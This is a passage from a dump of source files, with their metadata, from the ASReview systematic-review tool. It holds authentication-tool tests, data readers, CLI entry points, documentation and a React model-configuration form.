This is done without the help of\n# the API, ensuring they can't be linked to a User account.\ndef test_link_project_with_json_string(client_auth, capsys):\n # import projects\n proj1, proj2 = import_2_unauthenticated_projects()\n # create 2 users\n user1 = crud.create_user(DB, 1)\n user2 = crud.create_user(DB, 2)\n # check database\n assert crud.count_users() == 2\n assert crud.count_projects() == 0\n # check if we have 2 folders in asreview path\n assert len(misc.get_folders_in_asreview_path()) == 2\n # get from the auth tool a json string\n auth_tool = get_auth_tool_object(Namespace(json=True))\n auth_tool.list_projects()\n out, _ = capsys.readouterr()\n # we replace the owner ids with the ids of the users\n json_string = out.replace(\": 0\", f\": {user1.id}\", 1)\n json_string = json_string.replace(\": 0\", f\": {user2.id}\", 1)\n\n # use this string to run the function with a new AuthTool\n auth_tool = get_auth_tool_object(Namespace(json=json.loads(json_string)))\n auth_tool.link_projects()\n # check database and check if the users own the correct project\n assert crud.count_projects() == 2\n project_dict = {\n proj[\"owner_id\"]: proj\n for proj in json.loads(json.loads(json_string))\n }\n for user in [user1, user2]:\n expected_proj = project_dict[user.id]\n assert len(user.projects) == 1\n assert user.projects[0].project_id == expected_proj[\"folder\"]\n assert user.projects[0].project_id == expected_proj[\"project_id\"]\n # check also on the file-system\n assert Path(asreview_path() / expected_proj[\"folder\"]).exists()\n\n\n# Test linking projects interactively\ndef test_link_projects_interactively(client_auth):\n # import projects\n proj1, proj2 = import_2_unauthenticated_projects()\n project_data = {p.config.get(\"id\"): p for p in [proj1, proj2]}\n # create a user\n user = crud.create_user(DB, 1)\n # check the database\n assert crud.count_users() == 1\n assert crud.count_projects() == 0\n # create AuthTool object\n auth_tool = get_auth_tool_object(Namespace(json=None))\n # run function with patched input\n with patch('builtins.input', side_effect=[user.id, user.id]):\n # link project to user\n auth_tool.link_projects()\n # check database again\n assert crud.count_projects() == 2\n # make sure the user has 2 different projects\n assert len([p.project_id for p in user.projects]) == 2\n # check user projects\n for project in user.projects:\n org_data = project_data[project.project_id]\n assert org_data.config.get(\"id\") == project.project_id\n assert Path(asreview_path() / project.project_id).exists()\n\n\n# Test linking projects with a typo\ndef test_link_projects_interactively_with_typo(client_auth):\n # import projects\n proj1, proj2 = import_2_unauthenticated_projects()\n # create a user\n user = crud.create_user(DB, 1)\n # check the database\n assert crud.count_users() == 1\n assert crud.count_projects() == 0\n # create AuthTool object\n auth_tool = get_auth_tool_object(Namespace(json=None))\n # run function with patched input (there is a wrong id in there)\n with patch('builtins.input', side_effect=[user.id, str(-5), user.id]):\n # link project to user\n auth_tool.link_projects()\n # check database again\n assert crud.count_projects() == 2\n\n\n# Test failure of anything related to projects if a project is older\n# than version 0.x.\[email protected](\n \"method\",\n [\n \"_generate_project_links\",\n \"list_projects\",\n \"link_projects\"\n ]\n)\ndef test_projects_with_0x_projects(client_auth, method):\n # import projects\n proj1, proj2 = 
import_2_unauthenticated_projects(with_upgrade=False)\n # make sure these projects exist\n assert len(misc.get_folders_in_asreview_path()) == 2\n # create AuthTool object\n auth_tool = get_auth_tool_object(Namespace(json=None))\n # try to link project to user\n with pytest.raises(RuntimeError) as error:\n func = getattr(auth_tool, method)\n func()\n assert \"Version of project with id\" in str(error.value)\n assert \"too old\" in str(error.value)\n" }, { "alpha_fraction": 0.6112614870071411, "alphanum_fraction": 0.6210070252418518, "avg_line_length": 30.305084228515625, "blob_id": "29bc44e1f92286e80c45c37a53eeb16e2046aea0", "content_id": "1afe315d0f81b7bac49f734a05f5c613197a7485", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1847, "license_type": "permissive", "max_line_length": 75, "num_lines": 59, "path": "/asreview/io/excel_reader.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport pandas as pd\n\nfrom asreview.config import COLUMN_DEFINITIONS\nfrom asreview.io.utils import _standardize_dataframe\n\n\nclass ExcelReader:\n \"\"\"Excel file reader.\"\"\"\n\n read_format = [\".xlsx\"]\n write_format = [\".csv\", \".tsv\", \".xlsx\"]\n\n @classmethod\n def read_data(cls, fp):\n \"\"\"Import dataset.\n\n Arguments\n ---------\n fp: str, pathlib.Path\n File path to the Excel file (.xlsx).\n\n Returns\n -------\n list:\n List with entries.\n \"\"\"\n try:\n dfs = pd.read_excel(fp, sheet_name=None)\n except UnicodeDecodeError:\n dfs = pd.read_excel(fp, sheet_name=None, encoding=\"ISO-8859-1\")\n\n best_sheet = None\n sheet_obj_val = -1\n wanted_columns = []\n for type_name, type_list in COLUMN_DEFINITIONS.items():\n wanted_columns.extend(type_list)\n\n for sheet_name in dfs:\n col_names = set([col.lower() for col in list(dfs[sheet_name])])\n obj_val = len(col_names & set(wanted_columns))\n if obj_val > sheet_obj_val:\n sheet_obj_val = obj_val\n best_sheet = sheet_name\n\n return _standardize_dataframe(dfs[best_sheet])\n" }, { "alpha_fraction": 0.7963235378265381, "alphanum_fraction": 0.8051470518112183, "avg_line_length": 44.33333206176758, "blob_id": "0d9bd0f6769710c8181cc94a07e310ce13f1e471", "content_id": "ad19dacb4bbfc416464a94a248cf789de101172d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1360, "license_type": "permissive", "max_line_length": 74, "num_lines": 30, "path": "/asreview/models/query/__init__.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom asreview.models.query.cluster import ClusterQuery\nfrom asreview.models.query.max import MaxQuery\nfrom asreview.models.query.mixed import MaxRandomQuery\nfrom asreview.models.query.mixed import MaxUncertaintyQuery\nfrom asreview.models.query.mixed import MixedQuery\nfrom asreview.models.query.random import RandomQuery\nfrom asreview.models.query.uncertainty import UncertaintyQuery\nfrom asreview.models.query.utils import get_query_class\nfrom asreview.models.query.utils import get_query_model\nfrom asreview.models.query.utils import list_query_strategies\n\n\"\"\"Query strategies query records to label by the user.\n\nThere are several query strategies available. In configuration files,\nparameters are found under the section ``[query_param]``.\n\"\"\"\n" }, { "alpha_fraction": 0.6611279249191284, "alphanum_fraction": 0.6681772470474243, "avg_line_length": 30.03125, "blob_id": "04afc97931b3965069bba89bdccce2672a581ca3", "content_id": "554d6ed8cca041775cd4a1d719d22f9d3e1393fc", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1986, "license_type": "permissive", "max_line_length": 75, "num_lines": 64, "path": "/asreview/entry_points/state_inspect.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport argparse\nfrom pathlib import Path\n\nimport pandas as pd\n\nfrom asreview.entry_points.base import BaseEntryPoint\nfrom asreview.project import get_project_path\nfrom asreview.project import open_state\n\n\ndef _parse_state_inspect_args():\n # parse arguments if available\n parser = argparse.ArgumentParser(\n prog=\"state-inspect\", description=\"Inspect state file.\"\n )\n parser.add_argument(\n \"project_id\", type=str, help=\"Project_id or path to ASReview file.\"\n )\n parser.add_argument(\n \"table\",\n type=str,\n help=\"Table to view (e.g. 
results, record_table, last_ranking).\",\n    )\n\n    return parser\n\n\nclass StateInspectEntryPoint(BaseEntryPoint):\n    \"\"\"Entry point to inspect ASReview LAB review progress.\"\"\"\n\n    def execute(self, argv):\n        parser = _parse_state_inspect_args()\n        args = parser.parse_args(argv)\n\n        if Path(args.project_id).suffix == \".asreview\":\n            project_path = args.project_id\n        else:\n            project_path = get_project_path(args.project_id)\n\n        with open_state(project_path) as s:\n            conn = s._connect_to_sql()\n\n            df = pd.read_sql(f\"select * from {args.table}\", conn)\n\n            if args.table == \"results\":\n                df[\"label\"] = df[\"label\"].astype(pd.Int64Dtype())\n\n            print(f\"Table '{args.table}':\\n\")\n            print(df)\n            print(\"\\n\")\n" }, { "alpha_fraction": 0.7463738322257996, "alphanum_fraction": 0.7484459280967712, "avg_line_length": 37.91935348510742, "blob_id": "6435138e6718f704faf61de5bac4f77f3b8c8ac2", "content_id": "d46cbee0c41adcd9c7374a5f5e7ba3ce3774c979", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2413, "license_type": "permissive", "max_line_length": 135, "num_lines": 62, "path": "/docs/source/overview_development.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "Overview\n========\n\nThe development section is meant for users who need advanced functions of\nASReview LAB and for developers. It contains technical information on the\nusage, instructions for developing extensions, and an extensive API reference.\n\nASReview architecture\n---------------------\n\nASReview provides users with an API to interact directly with the underlying ASReview\nmachinery. This gives researchers an interface to study the behavior of\nalgorithms and develop custom workflows. The following overview shows the\navailable interfaces for interacting with the ASReview software:\n\n..\n   Source file of image can be found at\n   https://github.com/asreview/asreview-artwork/tree/master/LayerOverview\n\n.. figure:: ../figures/asreview_layers_light_no_BG.png\n   :alt: ASReview API\n\n\n* Layer 5: ASReview CLOUD\n\n  - ASReview CLOUD is currently in development. For information on ASReview CLOUD,\n    be sure to visit our communication channels.\n\n* Layer 4: :doc:`ASReview LAB <project_create>`\n\n  - ASReview LAB is the user-friendly webapp and all underlying\n    interfaces. Documentation on LAB\n    can be found in the :doc:`ASReview LAB section <project_create>`.\n\n* Layer 3: REST API\n\n  - The REST API is a Flask API that lets the React\n    webapp communicate with the backend and algorithms. The REST API is not\n    documented and should be considered 'internal use only'.\n\n* Layer 2: :doc:`cli`\n\n  - The Command Line is an interface used to open ASReview LAB, run\n    simulations, and run :doc:`Subcommand extensions <extensions_dev>` for ASReview. This development section documents all available\n    command line options for both :doc:`ASReview LAB <start>` and :doc:`simulation mode <simulation_cli>`.\n\n* Layer 1: :doc:`reference`\n\n  - The ASReview API is a low-level Python interface for ASReview. 
This\n interface requires detailed knowledge about the workings of the software.\n This reference contains extensive documentation on all functions, classes,\n and modules found in ASReview.\n\n - An outline for usage can be found in :doc:`../simulation_api_example` and :doc:`example_api_asreview_file`.\n\nExtensions\n----------\n\n:doc:`The Create an extension <extensions_dev>` section documents the creation\nof model, subcommand, and dataset extensions for ASReview. More information on\nextensions can be found in the extension\n:doc:`extensions_overview`.\n" }, { "alpha_fraction": 0.5070277452468872, "alphanum_fraction": 0.5082619190216064, "avg_line_length": 33.56161117553711, "blob_id": "c3722e9e2ec686286d636808b987de1fb01fc88c", "content_id": "3279c47374f68a8f23bb0cdc8433e44c270f743c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 14585, "license_type": "permissive", "max_line_length": 167, "num_lines": 422, "path": "/asreview/webapp/src/ProjectComponents/SetupComponents/ModelComponents/ModelForm.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useQuery, useQueryClient } from \"react-query\";\nimport { connect } from \"react-redux\";\nimport {\n Box,\n CircularProgress,\n FormControl,\n FormHelperText,\n InputLabel,\n Link,\n MenuItem,\n Select,\n Stack,\n Typography,\n} from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nimport { InlineErrorHandler } from \"../../../Components\";\nimport { SelectItem } from \"../../../ProjectComponents\";\nimport { InfoCard } from \"../../SetupComponents\";\nimport { ProjectAPI } from \"../../../api/index.js\";\nimport { defaultAlgorithms, mapStateToProps } from \"../../../globals.js\";\n\nconst requirements = [\n {\n value: \"tensorflow\",\n link: \"https://asreview.readthedocs.io/en/latest/API/generated/asreview.models.classifiers.NN2LayerClassifier.html#asreview-models-classifiers-nn2layerclassifier\",\n },\n {\n value: \"gensim\",\n link: \"https://asreview.readthedocs.io/en/latest/API/generated/asreview.models.feature_extraction.Doc2Vec.html#asreview-models-feature-extraction-doc2vec\",\n },\n {\n value: \"sentence-transformers\",\n link: \"https://asreview.readthedocs.io/en/latest/API/generated/asreview.models.feature_extraction.SBERT.html#asreview-models-feature-extraction-sbert\",\n },\n];\n\nconst modelRequirement = (requirement) => {\n let link = requirements\n .filter((element) => element.value === requirement)\n .map((element) => element.link);\n return (\n <React.Fragment>\n requires <code>{requirement}</code> to be installed.{\" \"}\n <Link underline=\"none\" href={link} target=\"_blank\">\n Learn more\n </Link>{\" \"}\n </React.Fragment>\n );\n};\n\nconst PREFIX = \"ModelForm\";\n\nconst classes = {\n title: `${PREFIX}-title`,\n loading: `${PREFIX}-loading`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n [`& .${classes.title}`]: {\n paddingBottom: 16,\n },\n\n [`& .${classes.loading}`]: {\n display: \"flex\",\n justifyContent: \"center\",\n },\n}));\n\nconst ModelForm = (props) => {\n const queryClient = useQueryClient();\n const {\n data: modelOptions,\n error: fetchModelOptionsError,\n isError: isFetchModelOptionsError,\n isFetched: isFetchedModelOptions,\n isFetching: isFetchingModelOptions,\n isSuccess: isSuccessModelOptions,\n } = useQuery(\"fetchModelOptions\", ProjectAPI.fetchModelOptions, {\n refetchOnWindowFocus: false,\n });\n\n const {\n error: 
fetchModelConfigError,\n isError: isFetchModelConfigError,\n isFetched: isFetchedModelConfig,\n isFetching: isFetchingModelConfig,\n isSuccess: isSuccessModelConfig,\n } = useQuery(\n [\"fetchModelConfig\", { project_id: props.project_id }],\n ProjectAPI.fetchModelConfig,\n {\n enabled: props.project_id !== null,\n onSuccess: (data) => {\n props.setModel({\n classifier: data[\"model\"],\n query_strategy: data[\"query_strategy\"],\n balance_strategy: data[\"balance_strategy\"],\n feature_extraction: data[\"feature_extraction\"],\n });\n },\n refetchOnWindowFocus: false,\n },\n );\n\n const handleModel = (event) => {\n if (event.target.name === \"classifier\") {\n if (\n event.target.value === \"lstm-base\" ||\n event.target.value === \"lstm-pool\"\n ) {\n props.setModel({\n ...props.model,\n classifier: event.target.value,\n feature_extraction: \"embedding-lstm\",\n });\n } else {\n if (props.model?.feature_extraction === \"embedding-lstm\") {\n props.setModel({\n ...props.model,\n classifier: event.target.value,\n feature_extraction: defaultAlgorithms[\"feature_extraction\"],\n });\n } else {\n props.setModel({\n ...props.model,\n classifier: event.target.value,\n });\n }\n }\n }\n if (event.target.name === \"query_strategy\") {\n props.setModel({\n ...props.model,\n query_strategy: event.target.value,\n });\n }\n if (event.target.name === \"balance_strategy\") {\n props.setModel({\n ...props.model,\n balance_strategy: event.target.value,\n });\n }\n if (event.target.name === \"feature_extraction\") {\n props.setModel({\n ...props.model,\n feature_extraction: event.target.value,\n });\n }\n };\n\n const returnRequirement = () => {\n return (\n <React.Fragment>\n Some combinations take a long time to warm up. Some classifiers and\n feature extraction techniques require additional dependencies.{\" \"}\n {(props.model?.classifier === \"nn-2-layer\" ||\n props.model?.feature_extraction === \"embedding-idf\" ||\n props.model?.feature_extraction === \"embedding-lstm\") && (\n <React.Fragment>\n {props.model?.feature_extraction === \"tfidf\" &&\n \"This combination might crash on some systems with limited memory. 
\"}\n {props.model?.classifier === \"nn-2-layer\" &&\n modelOptions?.classifier\n .filter((e) => e.name === \"nn-2-layer\")\n .map((e) => e.label) + \" \"}\n {props.model?.feature_extraction === \"embedding-idf\" &&\n modelOptions?.feature_extraction\n .filter((e) => e.name === \"embedding-idf\")\n .map((e) => e.label) + \" \"}\n {props.model?.feature_extraction === \"embedding-lstm\" &&\n modelOptions?.feature_extraction\n .filter((e) => e.name === \"embedding-lstm\")\n .map((e) => e.label) + \" \"}\n {modelRequirement(\"tensorflow\")}\n </React.Fragment>\n )}\n {props.model?.feature_extraction === \"doc2vec\" && (\n <React.Fragment>\n {modelOptions?.feature_extraction\n .filter((e) => e.name === \"doc2vec\")\n .map((e) => e.label)}{\" \"}\n {modelRequirement(\"gensim\")}\n </React.Fragment>\n )}\n {props.model?.feature_extraction === \"sbert\" && (\n <React.Fragment>\n {modelOptions?.feature_extraction\n .filter((e) => e.name === \"sbert\")\n .map((e) => e.label)}{\" \"}\n {modelRequirement(\"sentence-transformers\")}\n </React.Fragment>\n )}\n </React.Fragment>\n );\n };\n\n const disableClassifierItem = (value) => {\n return value === \"nb\" && props.model?.feature_extraction === \"doc2vec\";\n };\n\n const disableFeatureExtractionItem = (value) => {\n return (\n (value === \"doc2vec\" && props.model?.classifier === \"nb\") ||\n (props.model?.classifier !== \"lstm-base\" &&\n props.model?.classifier !== \"lstm-pool\" &&\n value === \"embedding-lstm\") ||\n ((props.model?.classifier === \"lstm-base\" ||\n props.model?.classifier === \"lstm-pool\") &&\n value !== \"embedding-lstm\")\n );\n };\n\n const returnQueryStrategyHelperText = () => {\n if (props.model?.query_strategy === \"random\") {\n return \"Your review is not accelerated by the model\";\n }\n };\n\n const returnModelError = () => {\n if (isFetchModelOptionsError && !isFetchModelConfigError) {\n return fetchModelOptionsError?.message;\n }\n if (isFetchModelConfigError && !isFetchModelOptionsError) {\n return fetchModelConfigError?.message;\n }\n if (isFetchModelOptionsError && isFetchModelConfigError) {\n return (\n fetchModelOptionsError?.message + \" \" + fetchModelConfigError?.message\n );\n }\n };\n\n const refetchModel = () => {\n if (isFetchModelOptionsError) {\n queryClient.resetQueries(\"fetchModelOptions\");\n }\n if (isFetchModelConfigError) {\n queryClient.resetQueries(\"fetchModelConfig\");\n }\n };\n\n const resetMutateModelConfig = () => {\n queryClient.invalidateQueries(\"fetchModelConfig\");\n props.reset();\n };\n\n return (\n <Root>\n <Box className={classes.title}>\n <Typography variant=\"h6\">Model</Typography>\n <Typography variant=\"body2\" sx={{ color: \"text.secondary\" }}>\n An active learning model consists of a feature extraction technique, a\n classifier, a query strategy, and a balance strategy. 
The default\n setup (TF-IDF, Naive Bayes, Maximum, Dynamic resampling) overall has\n fast and excellent performance.{\" \"}\n <Link\n underline=\"none\"\n href={`https://asreview.nl/blog/active-learning-explained/`}\n target=\"_blank\"\n >\n Learn more\n </Link>\n </Typography>\n </Box>\n {returnRequirement() && <InfoCard info={returnRequirement()} />}\n <Stack spacing={3} sx={{ mt: 3 }}>\n {(isFetchingModelOptions || isFetchingModelConfig) && (\n <Box className={classes.loading}>\n <CircularProgress />\n </Box>\n )}\n {!isFetchModelOptionsError &&\n !isFetchModelConfigError &&\n !isFetchingModelOptions &&\n !isFetchingModelConfig &&\n isFetchedModelOptions &&\n isFetchedModelConfig &&\n isSuccessModelOptions &&\n isSuccessModelConfig && (\n <Box component=\"form\" noValidate autoComplete=\"off\">\n <Stack direction=\"column\" spacing={3}>\n <FormControl fullWidth>\n <InputLabel id=\"feature-extraction-select-label\">\n Feature extraction technique\n </InputLabel>\n <Select\n id=\"select-feature-extraction\"\n name=\"feature_extraction\"\n label=\"Feature extraction technique\"\n value={props.model?.feature_extraction}\n onChange={handleModel}\n >\n {modelOptions?.feature_extraction.map((value) => {\n return (\n <MenuItem\n key={`result-item-${value.name}`}\n checked={\n props.model?.feature_extraction === value.name\n }\n value={value.name}\n disabled={disableFeatureExtractionItem(value.name)}\n >\n <SelectItem\n primary={value.label}\n secondary={value.description}\n />\n </MenuItem>\n );\n })}\n </Select>\n </FormControl>\n <FormControl fullWidth>\n <InputLabel id=\"classifier-select-label\">\n Classifier\n </InputLabel>\n <Select\n labelId=\"select-classifier-label\"\n id=\"select-classifier\"\n name=\"classifier\"\n label=\"Classifier\"\n value={props.model?.classifier}\n onChange={handleModel}\n >\n {modelOptions?.classifier.map((value) => {\n return (\n <MenuItem\n key={`result-item-${value.name}`}\n checked={props.model?.classifier === value.name}\n value={value.name}\n disabled={disableClassifierItem(value.name)}\n >\n <SelectItem\n primary={value.label}\n secondary={value.description}\n />\n </MenuItem>\n );\n })}\n </Select>\n </FormControl>\n <FormControl fullWidth>\n <InputLabel id=\"query-strategy-select-label\">\n Query strategy\n </InputLabel>\n <Select\n id=\"select-query-strategy\"\n name=\"query_strategy\"\n label=\"Query strategy\"\n value={props.model?.query_strategy}\n onChange={handleModel}\n >\n {modelOptions?.query_strategy.map((value) => {\n return (\n <MenuItem\n key={`result-item-${value.name}`}\n checked={props.model?.query_strategy === value.name}\n value={value.name}\n >\n <SelectItem\n primary={value.label}\n secondary={value.description}\n />\n </MenuItem>\n );\n })}\n </Select>\n <FormHelperText>\n {returnQueryStrategyHelperText()}\n </FormHelperText>\n </FormControl>\n <FormControl fullWidth>\n <InputLabel id=\"balance-strategy-select-label\">\n Balance strategy\n </InputLabel>\n <Select\n id=\"select-balance-strategy\"\n name=\"balance_strategy\"\n label=\"Balance strategy\"\n value={props.model?.balance_strategy}\n onChange={handleModel}\n >\n {modelOptions?.balance_strategy.map((value) => {\n return (\n <MenuItem\n key={`result-item-${value.name}`}\n checked={props.model?.balance_strategy === value.name}\n value={value.name}\n >\n <SelectItem\n primary={value.label}\n secondary={value.description}\n />\n </MenuItem>\n );\n })}\n </Select>\n </FormControl>\n </Stack>\n </Box>\n )}\n {(isFetchModelOptionsError || isFetchModelConfigError) && (\n 
<InlineErrorHandler\n message={returnModelError()}\n refetch={refetchModel}\n button={true}\n />\n )}\n {props.isMutateModelConfigError && (\n <InlineErrorHandler\n message={props.mutateModelConfigError?.message}\n refetch={resetMutateModelConfig}\n button={true}\n />\n )}\n </Stack>\n </Root>\n );\n};\n\nexport default connect(mapStateToProps)(ModelForm);\n" }, { "alpha_fraction": 0.7412199378013611, "alphanum_fraction": 0.7523105144500732, "avg_line_length": 32.8125, "blob_id": "3339e700a026a2cd36475085f959fbc99777b1f7", "content_id": "adc1b0ce8cc8d43447c44b3d97088d4de31209f0", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1082, "license_type": "permissive", "max_line_length": 74, "num_lines": 32, "path": "/asreview/entry_points/lab.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom asreview.entry_points.base import BaseEntryPoint\nfrom asreview.webapp.run_model import main as main_run_model\nfrom asreview.webapp.start_flask import main as main_flask\n\n\nclass LABEntryPoint(BaseEntryPoint):\n \"\"\"Entry point to start the ASReview LAB webapp.\"\"\"\n\n def execute(self, argv):\n\n main_flask(argv)\n\n\nclass WebRunModelEntryPoint(BaseEntryPoint):\n description = \"Internal use only.\"\n\n def execute(self, argv):\n main_run_model(argv)\n" }, { "alpha_fraction": 0.6607362031936646, "alphanum_fraction": 0.6644172072410583, "avg_line_length": 27.10344886779785, "blob_id": "263dd7b7218ef6d6f7cca7f59ad3067db9c08e95", "content_id": "d575a300b3d23fb8636aae4e831067bce1b0a25b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3260, "license_type": "permissive", "max_line_length": 84, "num_lines": 116, "path": "/asreview/webapp/io.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport logging\nimport os\nimport pickle\nfrom pathlib import Path\n\nimport pandas as pd\n\nfrom asreview._version import get_versions\nfrom asreview.data import ASReviewData\nfrom asreview.project import ProjectNotFoundError\nfrom asreview.project import is_project\n\n\nclass CacheDataError(Exception):\n pass\n\n\ndef _get_cache_data_path(fp_data):\n return Path(fp_data).with_suffix(fp_data.suffix + \".pickle\")\n\n\ndef _read_data_from_cache(fp_data, version_check=True):\n fp_data_pickle = _get_cache_data_path(fp_data)\n\n try:\n # get the pickle data\n with open(fp_data_pickle, \"rb\") as f_pickle_read:\n data_obj, data_obj_version = pickle.load(f_pickle_read)\n\n # validate data object\n if not isinstance(data_obj.df, pd.DataFrame):\n raise ValueError()\n\n # drop cache files generated by older versions\n if (not version_check) or (get_versions()[\"version\"] == data_obj_version):\n return data_obj\n\n except FileNotFoundError:\n # file not available\n pass\n except Exception as err:\n # problem loading pickle file or outdated\n # remove the pickle file\n logging.error(f\"Error reading cache file: {err}\")\n try:\n os.remove(fp_data_pickle)\n except FileNotFoundError:\n pass\n\n raise CacheDataError()\n\n\ndef _write_data_to_cache(fp_data, data_obj):\n fp_data_pickle = _get_cache_data_path(fp_data)\n\n logging.info(\"Store a copy of the data in a pickle file.\")\n with open(fp_data_pickle, \"wb\") as f_pickle:\n pickle.dump((data_obj, get_versions()[\"version\"]), f_pickle)\n\n\ndef read_data(project, use_cache=True, save_cache=True):\n \"\"\"Get ASReviewData object from file.\n\n Parameters\n ----------\n project_path: str, iterable\n The project identifier.\n use_cache: bool\n Use the pickle file if available.\n save_cache: bool\n Save the file to a pickle file if not available.\n\n Returns\n -------\n ASReviewData:\n The data object for internal use in ASReview.\n\n \"\"\"\n\n if not is_project(project.project_path):\n raise ProjectNotFoundError()\n\n try:\n fp_data = Path(project.project_path, \"data\", project.config[\"dataset_path\"])\n except Exception:\n raise FileNotFoundError(\"Dataset not found\")\n\n # use cache file\n if use_cache:\n try:\n return _read_data_from_cache(fp_data)\n except CacheDataError:\n pass\n\n # load from file\n data_obj = ASReviewData.from_file(fp_data)\n\n # save a pickle version\n if save_cache:\n _write_data_to_cache(fp_data, data_obj)\n\n return data_obj\n" }, { "alpha_fraction": 0.7543859481811523, "alphanum_fraction": 0.780701756477356, "avg_line_length": 12.411765098571777, "blob_id": "aafe6d8b4e388edd4fc1d32964422066f87129bf", "content_id": "cfe47f5112dacec3eb3447e1d6381c329a60c341", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 228, "license_type": "permissive", "max_line_length": 21, "num_lines": 17, "path": "/asreview/webapp/tests/config/asreview.ini", "repo_name": "terrymyc/asreview", 
"src_encoding": "UTF-8", "text": "[user1]\[email protected]\nname=user1\naffiliation=Utrecht\npassword=1234User1!\n\n[user2]\[email protected]\nname=user2\naffiliation=Amsterdam\npassword=1234User2!\n\n[user3]\[email protected]\nname=user3\naffiliation=Eindhoven\npassword=1234User3!\n" }, { "alpha_fraction": 0.5339204668998718, "alphanum_fraction": 0.5347914695739746, "avg_line_length": 30.793846130371094, "blob_id": "5ce914b430655892330bd0747768d3afc66ff15e", "content_id": "1d624ca787c5d95ae2a7b105a94537f2fc5c362b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10333, "license_type": "permissive", "max_line_length": 114, "num_lines": 325, "path": "/asreview/entry_points/auth_tool.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import argparse\nimport json\nimport sys\nfrom argparse import RawTextHelpFormatter\nfrom uuid import UUID\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.exc import IntegrityError\nfrom sqlalchemy.orm import sessionmaker\n\nfrom asreview.entry_points.base import BaseEntryPoint\nfrom asreview.project import ASReviewProject\nfrom asreview.utils import asreview_path\nfrom asreview.webapp.authentication.models import Project\nfrom asreview.webapp.authentication.models import User\n\n\ndef auth_parser():\n parser = argparse.ArgumentParser(\n prog=\"auth_converter\",\n description=\"\"\"ASReview Authentication Conversion - convert your app to handle multiple users.\"\"\", # noqa\n formatter_class=RawTextHelpFormatter,\n epilog=\"Use -h or --help on all subcommands to view the available options.\",\n )\n\n sub_parser = parser.add_subparsers(help=\"The following options are available:\")\n\n user_par = sub_parser.add_parser(\"add-users\", help=\"Add users into the database.\")\n\n user_par.add_argument(\n \"-d\",\n \"--db-path\",\n type=str,\n help=\"Absolute path to authentication sqlite3 database.\",\n required=True,\n )\n\n user_par.add_argument(\n \"-j\",\n \"--json\",\n type=str,\n help=\"JSON string that contains a list with user account data.\",\n )\n\n list_users_par = sub_parser.add_parser(\n \"list-users\",\n help=\"List user accounts.\",\n )\n\n list_users_par.add_argument(\n \"-d\",\n \"--db-path\",\n type=str,\n help=\"Absolute path to authentication sqlite3 database.\",\n required=True,\n )\n\n list_projects_par = 